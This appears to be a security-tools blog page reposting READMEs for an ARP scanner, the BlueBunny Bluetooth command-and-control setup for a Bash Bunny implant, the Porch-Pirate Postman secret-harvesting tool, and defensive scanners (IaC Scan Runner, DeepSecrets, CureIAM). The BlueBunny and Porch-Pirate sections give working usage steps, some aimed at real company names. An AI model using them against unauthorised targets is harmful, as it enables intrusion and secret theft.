    Contributing

    Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.




    NetProbe - Network Probe

    By: Zion3R


    NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.
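    The underlying technique can be sketched with scapy; this is a minimal illustration, not NetProbe's actual code, and it requires scapy plus root privileges:

    from scapy.all import ARP, Ether, srp

    def arp_scan(subnet, iface=None):
        """Broadcast ARP who-has requests and collect replying IP/MAC pairs."""
        packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet)
        answered, _ = srp(packet, timeout=2, iface=iface, verbose=False)
        return [(recv.psrc, recv.hwsrc) for _, recv in answered]

    for ip, mac in arp_scan("192.168.1.0/24"):
        print(f"{ip:<15} {mac}")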

    Features

    • Scan for devices on a specified IP address or subnet
    • Display the IP address, MAC address, manufacturer, and device model of discovered devices
    • Live tracking of devices (optional)
    • Save scan results to a file (optional)
    • Filter by manufacturer (e.g., 'Apple') (optional)
    • Filter by IP range (e.g., '192.168.1.0/24') (optional)
    • Scan rate in seconds (default: 5) (optional)

    Download

    You can download the program from the GitHub page.

    $ git clone https://github.com/HalilDeniz/NetProbe.git

    Installation

    To install the required libraries, run the following command:

    $ pip install -r requirements.txt

    Usage

    To run the program, use the following command:

    $ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
    • -h,--help: show this help message and exit
    • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
    • -i,--interface: Interface to use (default: None)
    • -l,--live: Enable live tracking of devices
    • -o,--output: Output file to save the results
    • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
    • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
    • -s,--scan-rate: Scan rate in seconds (default: 5)

    Example:

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

    Help Menu

    $ python3 netprobe.py --help                      
    usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

    NetProbe: Network Scanner Tool

    options:
    -h, --help show this help message and exit
    -t [ ...], --target [ ...]
    Target IP address or subnet (default: 192.168.1.0/24)
    -i [ ...], --interface [ ...]
    Interface to use (default: None)
    -l, --live Enable live tracking of devices
    -o , --output Output file to save the results
    -m , --manufacturer Filter by manufacturer (e.g., 'Apple')
    -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
    -s , --scan-rate Scan rate in seconds (default: 5)

    Default Scan

    $ python3 netprobe.py 

    Live Tracking

    You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

    Save Results

    You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

    $ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
    โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
    โ”ƒ IP Address   โ”ƒ MAC Address       โ”ƒ Packet Size โ”ƒ Manufacturer                 โ”ƒ
    โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
    โ”‚ 192.168.1.1  โ”‚ **:6e:**:97:**:28 โ”‚ 102         โ”‚ ASUSTek COMPUTER INC.        โ”‚
    โ”‚ 192.168.1.3  โ”‚ 00:**:22:**:12:** โ”‚ 102         โ”‚ InPro Comm                   โ”‚
    โ”‚ 192.168.1.2  โ”‚ **:32:**:bf:**:00 โ”‚ 102         โ”‚ Xiaomi Communications Co Ltd โ”‚
    โ”‚ 192.168.1.98 โ”‚ d4:**:64:**:5c:** โ”‚ 102         โ”‚ ASUSTek COMPUTER INC.        โ”‚
    โ”‚ 192.168.1.25 โ”‚ **:49:**:00:**:38 โ”‚ 102         โ”‚ Unknown                      โ”‚
    โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
    

    Contact

    If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

    License

    This program is released under the MIT LICENSE. See LICENSE for more information.



    BlueBunny - BLE Based C2 For Hak5's Bash Bunny

    By: Zion3R


    C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
    Send your Bash Bunny all the instructions it needs just over the air.

    Overview

    Structure


    Installation & Start

    1. Install the required dependencies
    pip install pygatt "pygatt[GATTTOOL]"

    Make sure BlueZ is installed and gatttool is usable

    sudo apt install bluez
    2. Download BlueBunny's repository (and switch into the correct folder)
    git clone https://github.com/90N45-d3v/BlueBunny
    cd BlueBunny/C2
    3. Start the C2 server
    sudo python c2-server.py
    4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
    5. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (your Bash Bunny will light up green when it's ready to pair).

    Manual communication with the Bash Bunny through Python

    You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

    Example Code

    # Import the backend (BlueBunny/C2/BunnyLE.py)
    import BunnyLE

    # Define the data to send
    data = "QUACK STRING I love my Bash Bunny"
    # Define the type of the data to send ("cmd" or "payload") (payload data will be temporarily written to a file, to execute multiple commands like in a payload script file)
    d_type = "cmd"

    # Initialize BunnyLE
    BunnyLE.init()

    # Connect to your Bash Bunny
    bb = BunnyLE.connect()

    # Send the data and let it execute
    BunnyLE.send(bb, data, d_type)

    Troubleshooting

    Connecting your Bash Bunny doesn't work? Try the following instructions:

    • Try connecting a few more times
    • Check if your bluetooth adapter is available
    • Restart the system your C2 server is running on
    • Check if your Bash Bunny is running the BlueBunny payload properly
    • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

    Bugs within BlueZ

    The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kinds of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised, and stay calm if they show up.

    • Timeout after 5.0 seconds
    • Unknown error while scanning for BLE devices

    Working on...

    • Remote shell access
    • BLE exfiltration channel
    • Improved connecting process

    Additional information

    As I said, BlueZ, the base for the Bluetooth part used in BlueBunny, is somewhat bug-prone. If you encounter any non-temporary bugs when connecting to the Bash Bunny, or any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me, be it a problem, an idea/solution, or just nice feedback.



    Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

    By: Zion3R


    Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconnaissance / OSINT framework for Postman. While existing tools are great proofs of concept, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

    Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc.) from publicly accessible Postman entities, such as:

    • Workspaces
    • Collections
    • Requests
    • Users
    • Teams

    Installation

    python3 -m pip install porch-pirate

    Using the client

    The Porch Pirate client can be used to conduct nearly complete reviews of public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

    Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

    • --globals
    • --collections
    • --requests
    • --urls
    • --dump
    • --raw
    • --curl

    Simple Search

    porch-pirate -s "coca-cola.com"

    Get Workspace Globals

    By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

    Dump Workspace

    When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

    Automatic Search and Globals Extraction

    Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

    porch-pirate -s "shopify" --globals

    Automatic Search Dump

    Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

    porch-pirate -s "coca-cola.com" --dump

    Extract URLs from Workspace

    A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

    Automatic URL Extraction

    Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

    porch-pirate -s "coca-cola.com" --urls

    Show Collections in a Workspace

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

    Show Workspace Requests

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

    Show raw JSON

    porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

    Show Entity Information

    porch-pirate -w WORKSPACE_ID
    porch-pirate -c COLLECTION_ID
    porch-pirate -r REQUEST_ID
    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

from porchpirate import porchpirate

p = porchpirate()
print(p.search('coca-cola.com'))

    Get Workspace Collections

from porchpirate import porchpirate

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

import json

from porchpirate import porchpirate

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
        request_data = p.request(r['id'])
        print(request_data)

    Grabbing a Workspace's Globals

from porchpirate import porchpirate

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
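These calls can also be chained, for example to pull the globals for every workspace returned by a search. The sketch below is illustrative only: the 'data' and 'id' key names are assumptions based on the collections example above, so adjust them to the actual response schema.

import json

from porchpirate import porchpirate

p = porchpirate()
results = json.loads(p.search('coca-cola.com'))
# 'data' and 'id' are assumed key names (verify against the real schema)
for workspace in results.get('data', []):
    workspace_id = workspace.get('id')
    if workspace_id:
        print(p.workspace_globals(workspace_id))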

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities

    By: Zion3R


    Service that scans your Infrastructure as Code for common vulnerabilities.

    Aspect Information
    Tool name IaC Scan Runner
    Docker image xscanner/runner
    PyPI package iac-scan-runner
    Documentation docs
    Contact us xopera@xlab.si

    Purpose and description

The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) packages and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

    Running

    This section explains how to run the REST API.

    Run with Docker

    You can run the REST API using a public xscanner/runner Docker image as follows:

    # run IaC Scan Runner REST API in a Docker container and 
    # navigate to localhost:8080/swagger or localhost:8080/redoc
    $ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

    Or you can build the image locally and run it as follows:

    # build Docker container (it will take some time) 
    $ docker build -t iac-scan-runner .
    # run IaC Scan Runner REST API in a Docker container and
    # navigate to localhost:8080/swagger or localhost:8080/redoc
    $ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

    Run from CLI

    To run using the IaC Scan Runner CLI:

    # install the CLI
    $ python3 -m venv .venv && . .venv/bin/activate
    (.venv) $ pip install iac-scan-runner
    # print OpenAPI specification
    (.venv) $ iac-scan-runner openapi
    # install prerequisites
    (.venv) $ iac-scan-runner install
    # run IaC Scan Runner REST API
    (.venv) $ iac-scan-runner run

    Run from source

    To run locally from source:

    # Export env variables 
    export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
    export SCAN_PERSISTENCE=enabled
    export USER_MANAGEMENT=enabled

    # Setup MongoDB
    $ docker run --name mongodb -p 27017:27017 mongo

    # install prerequisites
    $ python3 -m venv .venv && . .venv/bin/activate
    (.venv) $ pip install -r requirements.txt
    (.venv) $ ./install-checks.sh
    # run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
    (.venv) $ uvicorn src.iac_scan_runner.api:app

    Usage and examples

This part shows one possible deployment and short examples of how to use the API calls.

First, we will clone the IaC Scan Runner repository and run the API.

    $ git clone https://github.com/xlab-si/iac-scan-runner.git
    $ docker compose up

    After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

1. Let's create a project named test.

curl -X 'POST' \
'http://0.0.0.0:8000/project?creator_id=test' \
-H 'accept: application/json' \
-d ''

The project ID will be returned to us. For this example, the project ID is 1e7b2a91-2896-40fd-8d53-83db56088026.

2. For example, let's say we want to initiate all checks except ansible-lint. Let's disable it.
    curl -X 'PUT' \
    'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
    -H 'accept: application/json'
3. Now that the project is configured, we can simply choose the files that we want to scan and zip them. For IaC-Scan-Runner to work, files are expected to be compressed archives (usually zip files). In this case the response type will be json, but it is possible to change it to html. Please change YOUR.zip to the path of your file.
    curl -X 'POST' \
    'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
    -H 'accept: application/json' \
    -H 'Content-Type: multipart/form-data' \
    -F 'iac=@YOUR.zip;type=application/zip'

    That is it.

    Extending the scan workflow with new check tools

At a certain point, it might be required to include new check tools within the scan workflow, with the aim of providing wider coverage of IaC standards and project types. This subsection identifies and describes the sequence of steps required for that purpose. For now, these steps have to be performed manually as described below, but the plan is to automate this procedure in the future via the API and to provide a user-friendly interface that aids the user when importing new tools into the catalogue that makes up the scan workflow.

Step 1 – Adding a tool-specific class to the checks directory

First, add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py

The class of the new tool inherits from the existing Check class, which provides a generalization of the scan workflow tools. Moreover, it is necessary to implement the following methods:

1. def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
2. def run(self, directory: str)

While the first method provides the tool-specific parameters needed to set the tool up (such as passwords, client IDs and tokens), the second specifies how the tool itself is invoked via API or CLI and how its raw output is returned.
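To make these two methods concrete, here is a minimal sketch of what such a class might look like. It is an illustration only: the import path of the Check base class, its constructor arguments, and the new_tool CLI invocation are assumptions, not the project's actual code.

import subprocess
from typing import Optional

from pydantic import SecretStr

from iac_scan_runner.check import Check  # import path is an assumption


class NewToolCheck(Check):
    def __init__(self):
        # Constructor arguments (name, description) are assumed.
        super().__init__("new_tool", "Example check tool")

    def configure(self, config_filename: Optional[str], secret: Optional[SecretStr]):
        # Store tool-specific parameters (passwords, client IDs, tokens, ...).
        self.config_filename = config_filename
        self.secret = secret

    def run(self, directory: str):
        # Invoke the tool via its CLI against the scanned directory
        # and return the raw output.
        result = subprocess.run(["new_tool", "--scan", directory],
                                capture_output=True, text=True)
        return result.stdout + result.stderr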

Step 2 – Adding the check tool class instance within the ScanRunner constructor

Once the new class derived from Check is added to the IaC Scan Runner's source code, the source code of its main class, called ScanRunner, also needs to be modified. First import the tool-specific class, then create a new check tool-specific class instance and add it to the dictionary of IaC checks inside def init_checks(self).

A. Importing the check tool class:

from iac_scan_runner.checks.tfsec import TfsecCheck

B. Creating a new instance of the check tool object inside init_checks:

"""Initiate predefined check objects"""
new_tool = NewToolCheck()

C. Adding it to the self.iac_checks dictionary inside init_checks:

self.iac_checks = {
    new_tool.name: new_tool,
    ...
}

Step 3 – Adding the check tool to the compatibility matrix inside the Compatibility class

Next, inside the file src/iac_scan_runner/compatibility.py, the dictionary that represents the compatibility matrix should be extended as well. There are two possible cases: a) a new file type is added as a key, together with a list of relevant tools as its value; b) the new tool is added to the compatibility list of an existing file type.

compatibility_matrix = {
    "new_type": ["new_tool_1", "new_tool_2"],
    ...
    "old_typeK": ["tool_1", ... "tool_N", "new_tool_3"]
}

Step 4 – Providing support for result summarization

Finally, the last step in the sequence of modifications required for the scan workflow extension is to modify the ResultsSummary class (src/iac_scan_runner/results_summary.py). Specifically, code needs to be appended to its summarize_outcome method that looks for tool-specific strings which can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, the following if-else structure should be included for each new tool:

if check == "new_tool":
    if outcome.find("Check pass string") > -1:
        self.outcomes[check]["status"] = "Passed"
        return "Passed"
    else:
        self.outcomes[check]["status"] = "Problems"
        return "Problems"

    Contact

    You can contact the xOpera team by sending an email to xopera@xlab.si.

    Acknowledgement

    This project has received funding from the European Unionโ€™s Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).



    Deepsecrets - Secrets Scanner That Understands Code

    By: Zion3R


    Yet another tool - why?

    Existing tools don't really "understand" code. Instead, they mostly parse texts.

    DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools.

    DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code.
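The idea behind hashed-secret matching can be shown in a few lines of Python. This is a conceptual sketch only: the hashing algorithm (SHA-256 here) and the ruleset layout are assumptions, so check the DeepSecrets docs for the actual scheme.

import hashlib

def sha256_hex(value: str) -> str:
    return hashlib.sha256(value.encode()).hexdigest()

# Hash your known secrets once and ship only the digests;
# "hunter2" is a stand-in value and SHA-256 is an assumed algorithm.
KNOWN_SECRET_HASHES = {sha256_hex("hunter2")}

def is_known_secret(token_value: str) -> bool:
    # The scanner can flag the plain secret in code without the
    # ruleset ever containing the secret itself.
    return sha256_hex(token_value) in KNOWN_SECRET_HASHES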

The under-the-hood story is told in articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem


    Mini-FAQ after release :)

    Pff, is it still regex-based?

Yes and no. Of course, it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes are an instrument, not a problem.

    Why don't you build true abstract syntax trees? It's academically more correct!

DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply overkill for our specific task. So the tool still follows the generic SAST way of code analysis but optimizes the AST part using a different approach.

    I'd like to build my own semantic rules. How do I do that?

Only through the code at the moment. Formalizing the rules and moving them into a flexible, user-controlled ruleset is in the plans.

    I still have a question

    Feel free to communicate with the maintainer

    Installation

    From Github via pip

    $ pip install git+https://github.com/avito-tech/deepsecrets.git

    From PyPi

    $ pip install deepsecrets

    Scanning

    The easiest way:

    $ deepsecrets --target-dir /path/to/your/code --outfile report.json

    This will run a scan against /path/to/your/code using the default configuration:

    • Regex checks by the built-in ruleset
    • Semantic checks (variable detection, entropy checks)

    Report will be saved to report.json

    Fine-tuning

    Run deepsecrets --help for details.

    Basically, you can use your own ruleset by specifying --regex-rules. Paths to be excluded from scanning can be set via --excluded-paths.

    Building rulesets

    Regex

    The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset.

    HashedSecret

    Example ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset.

    Contributing

    Under the hood

    There are several core concepts:

    • File
    • Tokenizer
    • Token
    • Engine
    • Finding
    • ScanMode

    File

    Just a pythonic representation of a file with all needed methods for management.

    Tokenizer

A component able to break the content of a file into pieces - Tokens - according to its own logic. There are three types of tokenizers available:

    • FullContentTokenizer: treats all content as a single token. Useful for regex-based search.
    • PerWordTokenizer: breaks given content by words and line breaks.
    • LexerTokenizer: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.

    Token

    A string with additional information about its semantic role, corresponding file, and location inside it.

    Engine

    A component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:

    • RegexEngine: checks tokens' values through a special ruleset
    • SemanticEngine: checks tokens produced by the LexerTokenizer using additional context - variable names and values
    • HashedSecretEngine: checks tokens' values by hashing them and trying to find coinciding hashes inside a special ruleset

    Finding

    This is a data structure representing a problem detected inside code. Features information about the precise location inside a file and a rule that found it.

    ScanMode

    This component is responsible for the scan process.

    • Defines the scope of analysis for a given work directory respecting exceptions
    • Allows declaring a PerFileAnalyzer - the method called against each file, returning a list of findings. The primary usage is to initialize necessary engines, tokenizers, and rulesets.
    • Runs the scan: a multiprocessing pool analyzes every file in parallel.
    • Prepares results for output and outputs them.

The current implementation has a CliScanMode, built from the user-provided config through the CLI args.
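To make the architecture tangible, here is a self-contained toy re-implementation of the File -> Tokenizer -> Engine -> Finding flow described above. All names and the ruleset shape are simplified stand-ins, not the actual DeepSecrets API.

import re
from dataclasses import dataclass

@dataclass
class Finding:
    rule: str
    file: str
    value: str

class PerWordTokenizer:
    # Breaks content by words and line breaks, as described above.
    def tokenize(self, path, content):
        return [(path, word) for word in content.split()]

class RegexEngine:
    # Checks token values against a (toy) ruleset of named regexes.
    def __init__(self, ruleset):
        self.rules = {name: re.compile(rx) for name, rx in ruleset.items()}

    def search(self, token):
        path, value = token
        return [Finding(name, path, value)
                for name, rx in self.rules.items() if rx.search(value)]

def per_file_analyzer(path, content, tokenizers, engines):
    # The PerFileAnalyzer-style callable: tokenize, then let every
    # engine inspect every token and collect the findings.
    findings = []
    for tokenizer in tokenizers:
        for token in tokenizer.tokenize(path, content):
            for engine in engines:
                findings.extend(engine.search(token))
    return findings

# Toy usage with a single regex rule
ruleset = {"aws-key-id": r"AKIA[0-9A-Z]{16}"}
print(per_file_analyzer("config.py", "key = 'AKIAABCDEFGHIJKLMNOP'",
                        [PerWordTokenizer()], [RegexEngine(ruleset)]))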

    Local development

The project is supposed to be developed using VSCode and the 'Remote Containers' feature.

    Steps:

    1. Clone the repository
    2. Open the cloned folder with VSCode
    3. Agree with 'Reopen in container'
    4. Wait until the container is built and necessary extensions are installed
    5. You're ready


    CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

    By: Zion3R

    Clean up of over permissioned IAM accounts on GCP infra in an automated way

CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle enforcement on GCP cloud infra. It enables DevOps and security teams to quickly clean up accounts in GCP infra that have been granted more permissions than they require. CureIAM fetches recommendations and insights from the GCP IAM recommender, scores them, and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.


    Key features

    Discover what makes CureIAM scalable and production grade.

• Config driven: The entire workflow of CureIAM is config driven. Skip to the Config section to know more about it.
• Scalable: It is designed to scale thanks to its plugin-driven, multiprocess and multi-threaded approach.
• Handles scheduling: Scheduling is embedded in the CureIAM code itself; configure the time, and CureIAM will run daily at that time.
• Plugin driven: The CureIAM codebase is completely plugin oriented, which means one can plug and play the existing plugins or create new ones to add more functionality.
• Tracks actionable insights: Every action that CureIAM takes is recorded for audit purposes. It can do that in a file store and in an Elasticsearch store. If you want, you can build other store plugins to push the records to other stores for tracking purposes.
• Scoring and enforcement: Every recommendation fetched by CureIAM is scored against various parameters, producing scores such as safe_to_apply_score, risk_score and over_privilege_score. Each score serves a different purpose: for example, safe_to_apply_score identifies whether a recommendation can be applied automatically, based on the threshold set in the CureIAM.yaml config file.

    Usage

Since CureIAM is built with Python, you can run it locally with these commands. Before running, make sure to have a configuration file ready in one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service account JSON file is present in the current directory, preferably named cureiamSA.json. This SA private key can be named anything, but for the Docker image build it is preferred to use this name. Make sure to reference this file in the config for GCP cloud.

    # Install necessary dependencies
    $ pip install -r requirements.txt

    # Run CureIAM now
    $ python -m CureIAM -n

# Run the CureIAM process as a scheduler
    $ python -m CureIAM

    # Check CureIAM help
    $ python -m CureIAM --help

CureIAM can also be run inside a Docker environment; this is completely optional and can be used for CI/CD with K8s cluster deployments.

    # Build docker image from dockerfile
    $ docker build -t cureiam .

# Run the image as a scheduler
    $ docker run -d cureiam

    # Run the image now
    $ docker run -f cureiam -m cureiam -n

    Config

The CureIAM.yaml configuration file is the heart of the CureIAM engine. Everything the engine does is based on the pipeline configured in this config file. Let's break it down into different sections to make the config look simpler.

1. Let's configure the first section, which is the logging configuration and the scheduler configuration.

logger:
  version: 1

  disable_existing_loggers: false

  formatters:
    verysimple:
      format: >-
        [%(process)s]
        %(name)s:%(lineno)d - %(message)s
      datefmt: "%Y-%m-%d %H:%M:%S"

  handlers:
    rich_console:
      class: rich.logging.RichHandler
      formatter: verysimple

    file:
      class: logging.handlers.TimedRotatingFileHandler
      formatter: simple
      filename: /tmp/CureIAM.log
      when: midnight
      encoding: utf8
      backupCount: 5

  loggers:
    adal-python:
      level: INFO

  root:
    level: INFO
    handlers:
      - rich_console
      - file

schedule: "16:00"

This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.

2. The next section configures the different modules which we MIGHT use in the pipeline. This falls under the plugins section in CureIAM.yaml. You can think of this section as a declaration of the different plugins.

plugins:
  gcpCloud:
    plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
    params:
      key_file_path: cureiamSA.json

  filestore:
    plugin: CureIAM.plugins.files.filestore.FileStore

  gcpIamProcessor:
    plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
    params:
      mode_scan: true
      mode_enforce: true
      enforcer:
        key_file_path: cureiamSA.json
        allowlist_projects:
          - alpha
        blocklist_projects:
          - beta
        blocklist_accounts:
          - foo@bar.com
        allowlist_account_types:
          - user
          - group
          - serviceAccount
        blocklist_account_types:
          - None
        min_safe_to_apply_score_user: 0
        min_safe_to_apply_score_group: 0
        min_safe_to_apply_score_SA: 50

  esstore:
    plugin: CureIAM.plugins.elastic.esstore.EsStore
    params:
      # Change http to https later if your elastic is using https
      scheme: http
      host: es-host.com
      port: 9200
      index: cureiam-stg
      username: security
      password: securepassword

    Each of these plugins declaration has to be of this form:

plugins:
  <plugin-name>:
    plugin: <class-name-as-python-path>
    params:
      param1: val1
      param2: val2

For example, for the plugin CureIAM.stores.esstore.EsStore, the plugin class is EsStore. All the params defined in the YAML have to match the declaration in the __init__() function of the same plugin class.
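For instance, a hypothetical store plugin declared with the generic params above would need a constructor with matching parameter names; a minimal sketch:

class MyStore:
    # Parameter names must match the keys under `params` in CureIAM.yaml.
    def __init__(self, param1, param2):
        self.param1 = param1
        self.param2 = param2

    def write(self, record):
        # A store plugin would persist audit records here (the method
        # name is illustrative, not the actual plugin interface).
        print(self.param1, self.param2, record)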

3. Once the plugins are defined, the next step is to define the auditing pipeline. It goes like this:

audits:
  IAMAudit:
    clouds:
      - gcpCloud
    processors:
      - gcpIamProcessor
    stores:
      - filestore
      - esstore

Multiple audits can be created out of this. The one created here is named IAMAudit, with four plugins in use: gcpCloud, gcpIamProcessor, filestore and esstore. Note that these are the same plugin names defined in step 2. Again, this only defines the pipeline; it does not run it. It will be considered for running with the definition in the next step.

4. Tell CureIAM to run the audits defined in the previous step.

run:
  - IAMAudits

And this completes the entire configuration for CureIAM. You can find the full sample here. This config-driven pipeline concept is inherited from the Cloudmarker framework.

    Dashboard

    The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.

    Contribute

[Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!

    Credits

    Gojek Product Security Team

    Demo


    =============

    NEW UPDATES May 2023 0.2.0

    Refactoring

• Breaking down the large code into multiple small functions
